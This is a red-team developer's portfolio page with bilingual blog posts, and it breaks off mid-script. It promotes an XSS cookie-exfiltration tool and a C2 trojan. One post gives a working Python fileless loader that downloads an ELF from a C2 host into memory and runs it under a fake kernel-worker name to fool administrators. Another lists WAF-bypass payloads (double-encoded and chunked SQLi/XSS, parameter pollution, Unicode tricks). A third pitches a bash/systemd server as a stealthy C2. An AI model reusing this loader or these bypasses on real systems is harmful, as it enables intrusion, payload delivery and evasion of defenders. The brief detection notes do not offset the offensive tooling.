Rysha | Red Team Security Specialist & Developer

./ IDENTITY_OVERVIEW
● SYSTEM ACTIVE

// VISUAL_SIGNATURE (DBL_CLICK_TO_TEST)

⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡔⠢⡀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡐⠀⠀⡏⡠⢄⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⣀⠜⠀⠀⠛⢻⠀⢰⠀⠀⠀
⠀⠀⠀⠀⠀⠀⢘⢫⠖⠀⠀⠀⠸⠋⠀⠆⠀⠀⠀
⠀⠀⠀⠀⢀⡔⢸⣯⠀⠀⠀⠀⣄⣴⣿⡄⠀⠀⠀
⠀⠀⠀⠀⡼⠀⣤⢛⢦⠀⠆⠀⠿⠉⠀⡆⠀⠀⠀
⠀⠀⣀⠼⢥⣾⠎⠀⠘⣷⠏⠀⠀⠀⠀⠸⡀⠀⠀
⠈⠙⠻⣶⠾⡷⠇⠀⠀⠘⠀⠀⠀⠄⠀⠀⣱⡀⠀
⠀⠀⡰⣻⡑⠀⠟⡇⠄⢀⠀⠐⣄⢸⡀⣾⣿⡇⠀
⠀⠀⢰⣿⣷⠆⠀⠘⢮⢮⣦⣀⠟⠃⠙⢿⡙⢆⠀
⠀⠀⠈⣏⣏⠀⠀⠀⠀⠀⠉⠙⠆⠀⠀⠀⠋⢷⡄
⠀⠀⠀⠀⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠀

CODENAME

REESHASX

@reeshasx

AVAILABLE FOR HIRE

~/identity/about.sh

$ cat /etc/mission

TARGET: @reeshasx ROLE: Python Programmer /Red Team / IT Specialist LOCATION: BA - Brazil STATUS: Bachelor's in Computer Science (In Progress) MISSION: Seeking to apply IT skills in a dynamic environment, contribute to impactful projects, and grow continuously through hands-on experience in offensive security and infrastructure.

LOCATION

BR-BA

ROLE

RED TEAM

TIMEZONE

UTC-3

LANGUAGES

PT/EN

// CURRENT_METRICS

EXPERIENCE

[

] 60%

COFFEE_LVL

[

] 95%

CURIOSITY

[

] MAX

SLEEP_MODE

[

] 15%

// FOCUS_AREAS

Red Team Ops Bug Bounty (bad :p) Malware Analysis CTF Player Python Dev Cloud Infra

$ curl fvk.lat/api/system/links

{
  "twitter": "@Reeshasx",
  "linkedin": "in/gab0-ad",
  "website": "fvk.lat"
}

[YOU] -----> [PORTFOLIO] -----> [REESHASX] -----> [COLLABORATION?]

./ EXECUTION_HISTORY

[LOGS: 1]

// ROLE_DEFINITION

Administrative Assistant

@Sesi Fieb

[2024-2026]

// TASKS_EXECUTED

> Responsible for managing documents and organizing internal processes.
> Supporting the IT department with inventory and technical assistance.
> Developed automations using spreadsheets and Python scripts.
> Handled supplier communication and solved daily operational issues.

// END_OF_LOG

./ ARSENAL_KIT
7 SECTORS // 55 MODULES

~/arsenal/neural_map.render

DRAG_NODES // SCROLL_ZOOM ● LIVE

~/arsenal/analysis.sh

$ describe --module

Select a module to extract metadata.

SECTOR: NULL STATUS: LOADED

security

16 modules

// LOADED_MODULES

cloud infra

7 modules

// LOADED_MODULES

languages

6 modules

// LOADED_MODULES

networking

9 modules

// LOADED_MODULES

web servers

6 modules

// LOADED_MODULES

cryptography

4 modules

// LOADED_MODULES

databases tools

7 modules

// LOADED_MODULES

TOTAL: 55 MODULES SECTORS: 7

ALL_MODULES_VERIFIED

./ ACTIVE_OPERATIONS
7 PAYLOADS LOADED

OFFENSIVE | 2026

ACTIVE

$

ReesXSS - Cyber Intelligence Platform

./exploits/reesxss_-_cyber_intelligence_platform.py

Advanced XSS payload builder and intelligence aggregator. Features real-time log feed, cookie/storage exfiltration, customized payloads (JS/SVG/IMG), and a TUI dashboard for monitoring zombie nodes. Designed for Red Team operations.

Python Flask JavaScript SQL

THREAT_LEVEL CRITICAL

EXECUTE_PAYLOAD →

RESEARCH | 2025

ACTIVE

$

Automation using OCR and OMR

./exploits/automation_using_ocr_and_omr.py

Developed an automation solution leveraging OCR and OMR to extract data from physical documents, populate forms, and integrate comments.

Python OCR OMR Computer Vision

THREAT_LEVEL LOW

EXECUTE_PAYLOAD →

OFFENSIVE | 2025

ACTIVE

$

C2 TUI Trojan

./exploits/c2_tui_trojan.py

Creating a C2 TUI Trojan with python, socket and textual; it can be used to control a remote machine and grab information from it.

Python Socket Textual

THREAT_LEVEL CRITICAL

EXECUTE_PAYLOAD →

RESEARCH | 2025

COMPLETED

$

Pure Linux HTTP Server

./exploits/pure_linux_http_server.py

Creating a HTTP server with echo and systemD socket without external tools or dependencies.

Bash SystemD Linux

THREAT_LEVEL LOW

EXECUTE_PAYLOAD →

RESEARCH | 2025

COMPLETED

$

How to use /dev/tcp/

./exploits/how_to_use_/dev/tcp/.py

Using linux /dev/tcp to create a http request with descriptor with just pure linux without external tools or dependencies.

Bash Linux Networking

THREAT_LEVEL MEDIUM

EXECUTE_PAYLOAD →

OFFENSIVE | 2025

ACTIVE

$

Massive Port Scanner + Grafana

./exploits/massive_port_scanner_+_grafana.py

I made a grafana panel with grafana(promtail and loki), python and docker to scan a IP CIDR to look for vulnerabilities and other technologies.

Python Docker Grafana Loki Promtail

THREAT_LEVEL CRITICAL

EXECUTE_PAYLOAD →

AUTOMATION | 2025

ACTIVE

$

Honeypot Dashboard

./exploits/honeypot_dashboard.py

I made a honeypot with grafana dashboard heatmap to look for attacks from massscan and other tools.

Python Grafana Docker

THREAT_LEVEL MEDIUM

EXECUTE_PAYLOAD →

OFFENSIVE: 3 DEFENSIVE: 1 RESEARCH: 3

ALL_SYSTEMS_NOMINAL

./ VULNERABILITY_DATABASE
● 4 RECORDS_FOUND

SAPPHOS TWITTER

>>

IDOR that allowed accessing all users data and ID-holding photos

Set 2025

RESOLVED

ID: VULN-1000

NETFLIX HACKERONE

>>

Lodash version disclosure via exposed banner

May 2024

RESOLVED

ID: VULN-1001

COINBASE HACKERONE

>>

WAF bypass & OpenResty version exposure

Sep 2024

RESOLVED

ID: VULN-1002

HOSTINGER HACKERONE

>>

Local File Inclusion (LFI) in web app

Mar 2024

RESOLVED

ID: VULN-1003

WHITEHAT_PROTOCOL_ACTIVE

./ AUTHORIZATION_KEYS

[VERIFIED: 3]

ID: CDE2088D57CA

VALID

// SECURE_STORAGE_ENCRYPTED

TOTAL: 3 SYNCED

> COMMS_UPLINK

ENCRYPTION: ENABLED ● SIGNAL_STABLE

MAIL_PROTO

EMAIL_RELAY

reeshasx@fvk.lat

rshaku@protonmail.com

SEND_PACKET

NET_LINK

PROFESSIONAL_NET

linkedin.com/in/...

CONNECT

SECURE_MESSAGE_DROP

DISCONNECTED

_ |E] .-|=====-. | | MAIL | |________|___ || || || www %%% vwv || )_(,;;;, ,;,\_/ www )_( || \|/ \_/ )_(\| (_) \| \ || /\\|/ |/ \| \|// | ___\|//__/||//_\V/_\|//_______\\|//V/\\|/__

TRANSMISSION_COMPLETE

Hash: 7f8a9d...c2b1
Status: DELIVERED_TO_ARCHIVE

TRANSMISSION_FAILED

> MONITORING_FREQUENCIES...

´´´´´´´´´´´´´´´´´´´´´´¶¶¶¶¶¶¶¶¶ ´´´´´´´´´´´´´´´´´´´´¶¶´´´´´´´´´´¶¶ ´´´´´´¶¶¶¶¶´´´´´´´¶¶´´´´´´´´´´´´´´¶¶ ´´´´´¶´´´´´¶´´´´¶¶´´´´´¶¶´´´´¶¶´´´´´¶¶ ´´´´´¶´´´´´¶´´´¶¶´´´´´´¶¶´´´´¶¶´´´´´´´¶¶ ´´´´´¶´´´´¶´´¶¶´´´´´´´´¶¶´´´´¶¶´´´´´´´´¶¶ ´´´´´´¶´´´¶´´´¶´´´´´´´´´´´´´´´´´´´´´´´´´¶¶ ´´´´¶¶¶¶¶¶¶¶¶¶¶¶´´´´´´´´´´´´´´´´´´´´´´´´¶¶ ´´´¶´´´´´´´´´´´´¶´¶¶´´´´´´´´´´´´´¶¶´´´´´¶¶ ´´¶¶´´´´´´´´´´´´¶´´¶¶´´´´´´´´´´´´¶¶´´´´´¶¶ ´¶¶´´´¶¶¶¶¶¶¶¶¶¶¶´´´´¶¶´´´´´´´´¶¶´´´´´´´¶¶ ´¶´´´´´´´´´´´´´´´¶´´´´´¶¶¶¶¶¶¶´´´´´´´´´¶¶ ´¶¶´´´´´´´´´´´´´´¶´´´´´´´´´´´´´´´´´´´´¶¶ ´´¶´´´¶¶¶¶¶¶¶¶¶¶¶¶´´´´´´´´´´´´´´´´´´´¶¶ ´´¶¶´´´´´´´´´´´¶´´¶¶´´´´´´´´´´´´´´´´¶¶ ´´´¶¶¶¶¶¶¶¶¶¶¶¶´´´´´¶¶´´´´´´´´´´´´¶¶ ´´´´´´´´´´´´´´´´´´´´´´´¶¶¶¶¶¶¶¶¶¶¶

LATENCY 12ms

PACKET_LOSS 0.0%

anon@garlic:~/deadrop# ./i2p_tunnel --outproxy

[*] root@ops:/mnt/vault# gpg --decrypt mission.sig

[*] Verifying signature... MATCHED

[*] Target data: HIDDEN_ASSETS

[*] Buffer status: 98%

[*] Route: TOR -> I2P -> VPN

[*] Status: STEALTH_MODE

[*] Sanitizing memory traces...

[*] ENCRYPTION LAYER 4 ACTIVE.

[*] SESSION_SECURED

[*] READY TO DROP_ _ _

> SYSTEM_KNOWLEDGE_BASE

LIBRARY_V1.0.4

LANG_SELECT:

Malware Dev 2026-06-02 @reeshasx

GHOST_IN_THE_RAM: Fileless Execution via memfd_create in Python

Como usar a syscall memfd_create direto pelo Python para rodar binários (ELF) na memória RAM sem nunca tocar no disco rígido.

[ 0x00 ] A MORTE DO /tmp

Sabe aquele velho tutorial de pós-exploração que diz pra você fazer um wget payload.elf -O /tmp/payload && chmod +x /tmp/payload && /tmp/payload? Hoje em dia, isso é um suicídio operacional. Qualquer solução de EDR (Endpoint Detection and Response) ou até mesmo um script bobo com inotify monitorando a pasta /tmp vai disparar um alerta e matar seu processo antes mesmo de você piscar.

A regra número um da evasão moderna é: {fmt('Se tocar no disco, você morre.', 'err')}

Mas como rodar um binário no Linux sem salvar ele num arquivo? A resposta é uma system call introduzida lá no Linux 3.17 chamada memfd_create.

[ 0x01 ] O QUE É MEMFD_CREATE?

A syscall memfd_create faz algo mágico: ela pede para o kernel criar um arquivo anônimo que existe exclusivamente na memória RAM (tecnicamente no tmpfs oculto do kernel). Ele te devolve um file descriptor (um número, tipo 3), mas não existe nenhum caminho no disco como /home/user/arquivo para ele.

Como sou Dev Python, não preciso compilar um C para usar isso. O Python tem a maravilhosa biblioteca ctypes que permite chamar funções direto do kernel Linux.

[ 0x02 ] O LOADER EM PYTHON

Abaixo está o esqueleto de como um Malware Fileless opera no Linux usando puro Python 3. Nesse script, a gente baixa um binário ELF da internet (pode ser seu rootkit, seu C2 beacon, etc), joga pra dentro do memfd e executa a partir da memória.

import urllib.request
import ctypes
import os

# 1. Syscall number para memfd_create (319 em x86_64) e flags
SYS_memfd_create = 319
MFD_CLOEXEC = 0x0001U

# Nome falso do processo (pra enganar o htop/ps)
fake_name = "kworker/u4:2"

# 2. Chama a syscall diretamente
libc = ctypes.CDLL("libc.so.6")
fd = libc.syscall(SYS_memfd_create, fake_name.encode('utf-8'), MFD_CLOEXEC)

if fd == -1:
    print("Falha ao criar memfd")
    exit(1)

# 3. Baixa o Payload Malicioso direto para a RAM (sem tocar no disco!)
req = urllib.request.urlopen("http://meu-c2.com/payload.elf")
payload_bytes = req.read()

# Escreve os bytes dentro do descritor de arquivo na memória
os.write(fd, payload_bytes)

# 4. Executa! O Linux mapeia os file descriptors em /proc/self/fd/
fd_path = f"/proc/self/fd/{{fd}}"
os.execv(fd_path, [fake_name])

[ 0x03 ] POR QUE ISSO É ASSUSTADOR?

Olhe bem para a linha os.execv(fd_path, [fake_name]). - Primeiro: O arquivo baixado via urlopen nunca foi salvo. Ficou em variáveis da RAM e foi injetado direto no file descriptor da RAM. O antivírus que escaneia o disco rígido é completamente inútil aqui. - Segundo: O primeiro argumento do array é o nome que vai aparecer no gerenciador de tarefas (ps, top). A gente chamou de kworker/u4:2, que é um processo padrão inofensivo do kernel Linux. Se um SysAdmin olhar os processos rodando, ele vai ver só mais um worker do kernel.

[ 0x04 ] FORENSE E DETECÇÃO

Isso quer dizer que é impossível de pegar? Não. Mas requer uma análise de memória avançada. Se o analista de SOC souber o que está procurando, ele vai usar comandos como ls -l /proc/*/fd e procurar por links simbólicos apontando para um caminho bizarro chamado /memfd:kworker/u4:2 (deleted).

O termo (deleted) no Linux geralmente aparece quando um arquivo aberto é apagado do disco. No caso do memfd, ele já nasce "deletado" (sem caminho). Mas ferramentas modernas de BPF (tipo o Tetragon da Isovalent) já conseguem interceptar a própria chamada da syscall memfd_create e gerar alertas.

{fmt('Dica Red Team:', 'success')} Para operações super sensíveis, você não baixa um ELF pronto. Você ofusca/encripta o ELF no servidor, baixa ele com Python, desencripta na memória e joga pro memfd. Seu processo não deixa rastro físico. É literalmente um {fmt('fantasma na RAM.', 'fuchsia')}

[ 0x00 ] THE DEATH OF /tmp

You know that old post-exploitation tutorial that tells you to do wget payload.elf -O /tmp/payload && chmod +x /tmp/payload && /tmp/payload? Nowadays, that is operational suicide. Any Endpoint Detection and Response (EDR) solution, or even a silly script with inotify monitoring the /tmp folder, will trigger an alert and kill your process before you can even blink.

Modern evasion rule number one is: {fmt('If it touches the disk, you die.', 'err')}

But how do you run a binary on Linux without saving it to a file? The answer is a system call introduced way back in Linux 3.17 called memfd_create.

[ 0x01 ] WHAT IS MEMFD_CREATE?

The memfd_create syscall does something magical: it asks the kernel to create an anonymous file that exists exclusively in RAM (technically in the kernel's hidden tmpfs). It hands you back a file descriptor (a number, like 3), but there is no path on the disk like /home/user/file for it.

Since I'm a Python Dev, I don't need to compile C code to use this. Python has the wonderful ctypes library that allows calling functions straight from the Linux kernel.

[ 0x02 ] THE PYTHON LOADER

Below is the skeleton of how a Fileless Malware operates on Linux using pure Python 3. In this script, we download an ELF binary from the internet (could be your rootkit, your C2 beacon, etc), shove it into the memfd and execute it from memory.

import urllib.request
import ctypes
import os

# 1. Syscall number for memfd_create (319 on x86_64) and flags
SYS_memfd_create = 319
MFD_CLOEXEC = 0x0001U

# Fake process name (to fool htop/ps)
fake_name = "kworker/u4:2"

# 2. Call the syscall directly
libc = ctypes.CDLL("libc.so.6")
fd = libc.syscall(SYS_memfd_create, fake_name.encode('utf-8'), MFD_CLOEXEC)

if fd == -1:
    print("Failed to create memfd")
    exit(1)

# 3. Download Malicious Payload straight to RAM (no disk touch!)
req = urllib.request.urlopen("http://my-c2.com/payload.elf")
payload_bytes = req.read()

# Write bytes inside the file descriptor in memory
os.write(fd, payload_bytes)

# 4. Execute! Linux maps file descriptors in /proc/self/fd/
fd_path = f"/proc/self/fd/{{fd}}"
os.execv(fd_path, [fake_name])

[ 0x03 ] WHY IS THIS SCARY?

Look closely at the line os.execv(fd_path, [fake_name]). - First: The file downloaded via urlopen was never saved. It stayed in RAM variables and was injected straight into the RAM file descriptor. The antivirus scanning the hard drive is completely useless here. - Second: The first argument of the array is the name that will show up in the task manager (ps, top). We called it kworker/u4:2, which is a standard harmless Linux kernel process. If a SysAdmin looks at running processes, they will just see another kernel worker.

[ 0x04 ] FORENSICS AND DETECTION

Does this mean it's impossible to catch? No. But it requires advanced memory analysis. If the SOC analyst knows what they are looking for, they will use commands like ls -l /proc/*/fd and search for symbolic links pointing to a weird path named /memfd:kworker/u4:2 (deleted).

The term (deleted) on Linux usually appears when an open file is deleted from the disk. In the memfd case, it's born "deleted" (pathless). But modern BPF tools (like Isovalent's Tetragon) can intercept the actual memfd_create syscall and generate alerts.

{fmt('Red Team Tip:', 'success')} For highly sensitive operations, you don't download a plain ELF. You obfuscate/encrypt the ELF on the server, download it with Python, decrypt it in memory, and shove it to memfd. Your process leaves no physical footprint. It is literally a {fmt('ghost in RAM.', 'fuchsia')}

#fileless #linux #python #evasion

OPEN_STANDALONE_FILE

Bug Bounty 2026-05-15 @reeshasx

WAF_EVASION_LOGS: Bypassing Enterprise Filters on High-Value Targets

Minha metodologia para encontrar brechas em WAFs corporativos e a história de como expus regras internas de um proxy.

[ 0x00 ] O MITO DA CAIXA INVIOLÁVEL

Todo mundo acha que empresas grandes têm defesas perfeitas. Quando você esbarra num WAF (Web Application Firewall) da Akamai, Cloudflare Enterprise ou Imperva num alvo gigante (como foi o caso da Coinbase que eu reportei), a tela de 403 Forbidden parece uma parede de concreto.

Mas o lance é o seguinte: WAFs não são mágicos. Eles são gigantescas coleções de Regex (expressões regulares) tentando entender tráfego web na força bruta. E se tem uma coisa que aprendi caçando bugs, é que onde tem parsing complexo, tem confusão.

[ 0x01 ] DESYNC: QUEM ESTÁ LENDO O QUÊ?

A chave para o bypass é causar uma dessincronização entre o que o WAF entende e o que o servidor Backend (a aplicação real) entende. O WAF bloqueia a palavra UNION SELECT. Mas e se você mandar U%6eION S%45LECT? - Se o WAF decodificar a URL apenas uma vez antes de validar, ele vê o texto com porcentagem e deixa passar. - Se a aplicação no backend decodificar uma segunda vez antes de executar no banco, o payload vira UNION SELECT novamente. - Boom. Bypass clássico de double-encoding.

[ 0x02 ] POLUIÇÃO DE PARÂMETROS (HPP)

Um dos meus favoritos. O que acontece se você enviar dois parâmetros com o mesmo nome na URL? GET /api/user?id=1&id=UNION SELECT...

A tecnologia A (ex: PHP) pega apenas o último valor.
A tecnologia B (ex: JSP/Tomcat) pega o primeiro valor.
A tecnologia C (ex: ASP.NET) concatena os dois.

Se o WAF for configurado para validar apenas o primeiro parâmetro, mas a aplicação em Node.js ler o último, o WAF vai validar o id=1 (que é seguro) e ignorar o payload venenoso no final. O backend, inocente, vai engolir o SQLi. É como passar com o contrabando por trás das costas do segurança.

[ 0x03 ] O CASO OPENRESTY

Num dos meus achados de recompensa (Bug Bounty), eu esbarrei num WAF bem parrudo. Toda tentativa direta de LFI ou XSS era sumariamente assassinada.

Comecei a fuzilar headers exóticos HTTP na requisição. X-Forwarded-Host, X-Rewrite-URL, Client-IP. A maioria dos WAFs são configurados para processar a URI original, mas os proxies reversos no meio do caminho podem alterar a requisição com base nesses headers se estiverem mal configurados.

Ao injetar um payload ofuscado num cabeçalho de proxy mal normalizado, consegui fazer o load balancer interno me cuspir não a página padrão de erro do WAF, mas sim uma página de debug do OpenResty. Eu expus a versão exata do proxy deles e as regras de roteamento internas simplesmente porque o filtro não cobria a combinação exata de caracteres unicode num header não-padrão.

[ 0x04 ] MINDSET DE CAÇADOR

Bypass de WAF raramente é usar ferramentas automatizadas como o sqlmap --tamper. Isso faz barulho e te dá um block de IP rápido.

Bypass é arte analítica. É bater na porta com uma letra minúscula, depois maiúscula, depois com espaço, depois com %00 (null byte), e ver como a resposta muda. É fazer o parser do WAF desistir por timeout ou confusão e deixar o pacote passar pro backend.

[ 0x05 ] TRANSFER-ENCODING: CHUNKED

Se você quer confundir WAFs antigos, essa é clássica. Quando enviamos dados HTTP via POST, geralmente dizemos o tamanho total no Content-Length. Mas o HTTP/1.1 permite enviar em "pedaços" usando o cabeçalho Transfer-Encoding: chunked. A mágica aqui é que muitos WAFs têm um limite de quantos "chunks" eles vão analisar antes de desistir (para economizar CPU).

Se você enviar:

POST /api/upload HTTP/1.1
Transfer-Encoding: chunked

1
<
1
s
1
c
1
r
...

O backend vai montar a string <script>... pedaço por pedaço e executar o XSS no banco, enquanto o WAF corporativo talvez não tenha re-montado o payload corretamente, olhando para blocos isolados inofensivos.

[ 0x06 ] NORMALIZAÇÃO UNICODE

Outro vetor assustador são os caracteres unicode que "se parecem" visualmente com letras, mas têm códigos hexadecimais diferentes. No padrão Unicode, a letra K (Kelvin) K não é a letra K maiúscula normal K.

O WAF olha para SELECKT e diz: "Isso não é um comando SQL, bloqueio não necessário." Mas quando isso entra no backend (um banco MySQL com charset utf8mb4 mal configurado, por exemplo), a engine do banco realiza a "normalização". Ela converte K para o clássico K maiúsculo. De repente, seu pacote inofensivo vira um SELECT monstruoso extraindo senhas.

Dica de Ouro: Caçar falhas em filtros não é sobre encontrar o payload mais complexo do Github. É entender perfeitamente a cadeia de tecnologias (Load Balancer -> WAF -> Proxy -> Backend -> Database) e achar onde a conversão de dados difere. A defesa corporativa é focada em padrões conhecidos. Seja o padrão desconhecido e o WAF se tornará cego.

[ 0x00 ] THE MYTH OF THE IMPENETRABLE BOX

Everyone thinks big companies have perfect defenses. When you bump into a WAF (Web Application Firewall) from Akamai, Cloudflare Enterprise, or Imperva on a giant target (like in the Coinbase case I reported), that 403 Forbidden screen feels like a concrete wall.

But here's the thing: WAFs aren't magical. They are massive collections of Regex (regular expressions) brute-forcing their way into understanding web traffic. And if there's one thing I've learned hunting bugs, it's that where there is complex parsing, there is confusion.

[ 0x01 ] DESYNC: WHO IS READING WHAT?

The key to bypassing is causing a desynchronization between what the WAF understands and what the Backend server (the actual application) understands. The WAF blocks the word UNION SELECT. But what if you send U%6eION S%45LECT? - If the WAF decodes the URL only once before validating, it sees the percent-encoded text and lets it pass. - If the backend application decodes it a second time before executing it on the database, the payload turns back into UNION SELECT. - Boom. Classic double-encoding bypass.

[ 0x02 ] HTTP PARAMETER POLLUTION (HPP)

One of my favorites. What happens if you send two parameters with the same name in the URL? GET /api/user?id=1&id=UNION SELECT...

Technology A (e.g., PHP) takes only the last value.
Technology B (e.g., JSP/Tomcat) takes the first value.
Technology C (e.g., ASP.NET) concatenates them.

If the WAF is configured to only validate the first parameter, but the Node.js application reads the last one, the WAF will validate id=1 (which is safe) and ignore the poisonous payload at the end. The innocent backend will swallow the SQLi. It's like sneaking contraband right behind the security guard's back.

[ 0x03 ] THE OPENRESTY CASE

During one of my bounty hunts, I hit a really tough WAF. Every direct attempt at LFI or XSS was summarily assassinated.

I started shotgunning exotic HTTP headers into the request. X-Forwarded-Host, X-Rewrite-URL, Client-IP. Most WAFs are configured to process the original URI, but reverse proxies along the way might alter the request based on these headers if they are misconfigured.

By injecting an obfuscated payload into a poorly normalized proxy header, I managed to make the internal load balancer spit out not the standard WAF error page, but a debug page from OpenResty. I exposed their exact proxy version and internal routing rules simply because the filter didn't cover the exact combination of unicode characters in a non-standard header.

[ 0x04 ] HUNTER MINDSET

WAF bypassing is rarely about using automated tools like sqlmap --tamper. That just makes noise and gets your IP blocked fast.

Bypassing is an analytical art. It's knocking on the door with a lowercase letter, then uppercase, then with a space, then with a %00 (null byte), and watching how the response changes. It's about making the WAF parser give up due to timeout or confusion and letting the packet slip through to the backend.

[ 0x05 ] TRANSFER-ENCODING: CHUNKED

If you want to confuse older WAFs, this is a classic. When sending HTTP POST data, we usually state the total size in Content-Length. But HTTP/1.1 allows sending it in "pieces" using the Transfer-Encoding: chunked header. The magic here is that many WAFs have a limit on how many "chunks" they will analyze before giving up (to save CPU).

If you send:

POST /api/upload HTTP/1.1
Transfer-Encoding: chunked

1
<
1
s
1
c
1
r
...

The backend will reassemble the string <script>... piece by piece and execute the XSS, while the corporate WAF might not have reassembled the payload correctly, looking at isolated, harmless blocks.

[ 0x06 ] UNICODE NORMALIZATION

Another scary vector is unicode characters that visually "look like" letters but have different hex codes. In the Unicode standard, the letter K (Kelvin Sign) K is not the standard uppercase K K.

The WAF looks at SELECKT and says: "This is not an SQL command, blocking unnecessary." But when this hits the backend (a MySQL database with poorly configured utf8mb4 charset, for example), the database engine performs "normalization". It converts K to the classic uppercase K. Suddenly, your harmless packet becomes a monstrous SELECT extracting passwords.

Golden Tip: Hunting flaws in filters isn't about finding the most complex payload on Github. It's about perfectly understanding the technology chain (Load Balancer -> WAF -> Proxy -> Backend -> Database) and finding where the data conversion differs. Corporate defense is focused on known patterns. Be the unknown pattern, and the WAF will become blind.

#waf #bug-bounty #evasion #openresty #headers

OPEN_STANDALONE_FILE

Research 2026-04-05 @reeshasx

GHOST_SERVERS: Implementing HTTP via SystemD Sockets & Bash

Levantando um servidor web no Linux consumindo quase zero de memória e sem depender de Apache, Nginx ou Python.

[ 0x00 ] A GORDURA DOS SERVIDORES MODERNOS

A gente se acostumou mal. Pra servir um simples arquivo JSON ou uma página estática, hoje a galera sobe um container de Node.js, um Apache ou no mínimo um Nginx. Isso puxa dezenas de megabytes de RAM, abre margem pra N vulnerabilidades nas dependências, e deixa um rastro gigantesco.

Mas o que acontece se você precisar levantar um serviço furtivo, ou simplesmente provar que entende de Linux de verdade? E se eu te disser que você pode criar um servidor HTTP funcional usando apenas Bash e o SystemD?

Isso é o que eu chamo de Ghost Server.

[ 0x01 ] SYSTEMD SOCKET ACTIVATION

A mágica começa com uma feature subestimada do Linux: Socket Activation. Ao invés de deixar um programa rodando 24/7 ouvindo uma porta (gastando memória), você manda o SystemD ouvir a porta. Quando alguém conecta nessa porta, o SystemD acorda o seu script, repassa a conexão via stdin/stdout (entrada e saída padrão), e quando termina, ele mata o processo.

Zero consumo de RAM enquanto está ocioso. Lindo, não?

Crie o arquivo /etc/systemd/system/ghost-http.socket:

[Unit]
Description=Ghost HTTP Socket

[Socket]
ListenStream=8080
Accept=yes

[Install]
WantedBy=sockets.target

Note o Accept=yes. Isso diz pro SystemD spawnar uma nova instância do nosso serviço para cada conexão que chegar.

[ 0x02 ] O SERVIÇO FANTASMA

Agora, criamos o arquivo que diz o que o SystemD deve executar. /etc/systemd/system/ghost-http@.service:

[Unit]
Description=Ghost HTTP Service

[Service]
StandardInput=socket
ExecStart=/usr/local/bin/ghost-server.sh

[ 0x03 ] O BASH COMO BACKEND DA WEB

E aqui entra o nosso código fonte do servidor. Sem bibliotecas, sem frescura. Ele só precisa cuspir o cabeçalho HTTP válido de volta pelo stdout.

/usr/local/bin/ghost-server.sh:

#!/bin/bash
# Lemos a primeira linha da requisição (ex: GET /index.html HTTP/1.1)
read request

# Removemos quebras de linha sujas
request=$(echo $request | tr -d '\r\n')

# Ignoramos o resto dos headers porque somos minimalistas (e um pouco preguiçosos)
while read line; do
    line=$(echo $line | tr -d '\r\n')
    [ -z "$line" ] && break
done

# Resposta HTTP crua!
echo -e "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nConnection: close\r\n\r\n"
echo -e "<h1>Bem vindo ao Ghost Server</h1><p>Zero NPM. Zero Python. Apenas Bash.</p>"

[ 0x04 ] START AND FORGET

Dá permissão de execução, habilita e pronto:

chmod +x /usr/local/bin/ghost-server.sh
systemctl enable --now ghost-http.socket

Pode dar curl no localhost:8080. Funciona que é uma beleza. Por que isso é útil? Pra red team, é um C2 (Command and Control) ou servidor de payload absurdamente furtivo. Pra infra, é um jeito incrivelmente seguro e leve de servir métricas internas ou painéis de status que não consomem recursos quando ninguém está olhando.

[ 0x05 ] ROTEOAMENTO BÁSICO NO BASH

Servir uma página estática é legal, mas e se quisermos servir arquivos dinâmicos baseados na URL? O $request que capturamos tem tudo o que precisamos. Podemos extrair a rota (ex: /api/data) com awk ou bash puro:

route=$(echo "$request" | awk '{print $2}')

if [ "$route" == "/api/status" ]; then
    echo -e "HTTP/1.1 200 OK
Content-Type: application/json

"
    echo "{ "status": "ghosting", "load": $(cat /proc/loadavg | awk '{print $1}') }"
elif [[ "$route" == *.json ]]; then
    file="."$route
    if [ -f "$file" ]; then
        echo -e "HTTP/1.1 200 OK
Content-Type: application/json

"
        cat "$file"
    else
        echo -e "HTTP/1.1 404 Not Found

"
    fi
else
    echo -e "HTTP/1.1 403 Forbidden

"
fi

Pronto, você acabou de reinventar o Express.js usando shell script. E incrivelmente, isso aguenta porrada.

[ 0x06 ] LIMITAÇÕES E PERFOMANCE

Isso vai aguentar o tráfego da Amazon na Black Friday? Claro que não. O SystemD spwana um novo processo bash para cada conexão. Fazer 1000 requisições concorrentes significa 1000 processos bash nascendo e morrendo. A latência média fica na casa dos 5ms, mas a CPU sofre com o custo de context-switching e criação de processos se houver sobrecarga.

Entretanto, para APIs internas, callbacks (webhooks) invisíveis para C2s e administração de sistemas remotos (onde a carga é baixa), é a solução mais silenciosa e elegante possível. O administrador que abrir o top ou o htop dificilmente vai suspeitar de instâncias curtas do /bin/bash rodando pelo sistema (pois o sistema inteiro já faz isso naturalmente). Às vezes, a melhor ferramenta não é instalar mais pacotes, mas sim usar o que o sistema operacional já te dá de bandeja.

[ 0x00 ] THE FAT OF MODERN SERVERS

We've gotten spoiled. To serve a simple JSON file or a static page, people nowadays spin up a Node.js container, an Apache server, or at least an Nginx. This pulls dozens of megabytes of RAM, opens up room for N vulnerabilities in dependencies, and leaves a massive footprint.

But what happens if you need to spin up a stealthy service, or just prove you truly understand Linux? What if I told you that you could create a functional HTTP server using only Bash and SystemD?

This is what I call a Ghost Server.

[ 0x01 ] SYSTEMD SOCKET ACTIVATION

The magic starts with an underrated Linux feature: Socket Activation. Instead of leaving a program running 24/7 listening on a port (wasting memory), you tell SystemD to listen to the port. When someone connects, SystemD wakes up your script, passes the connection via stdin/stdout (standard input/output), and when it's done, it kills the process.

Zero RAM consumption while idle. Beautiful, right?

Create the file /etc/systemd/system/ghost-http.socket:

[Unit]
Description=Ghost HTTP Socket

[Socket]
ListenStream=8080
Accept=yes

[Install]
WantedBy=sockets.target

Note the Accept=yes. This tells SystemD to spawn a new instance of our service for every incoming connection.

[ 0x02 ] THE GHOST SERVICE

Now, we create the file that tells SystemD what to execute. /etc/systemd/system/ghost-http@.service:

[Unit]
Description=Ghost HTTP Service

[Service]
StandardInput=socket
ExecStart=/usr/local/bin/ghost-server.sh

[ 0x03 ] BASH AS THE WEB BACKEND

And here comes our server source code. No libraries, no fuss. It just needs to spit a valid HTTP header back out through stdout.

/usr/local/bin/ghost-server.sh:

#!/bin/bash
# Read the first line of the request (e.g., GET /index.html HTTP/1.1)
read request

# Remove dirty line breaks
request=$(echo $request | tr -d '\r\n')

# Ignore the rest of the headers because we are minimalist (and slightly lazy)
while read line; do
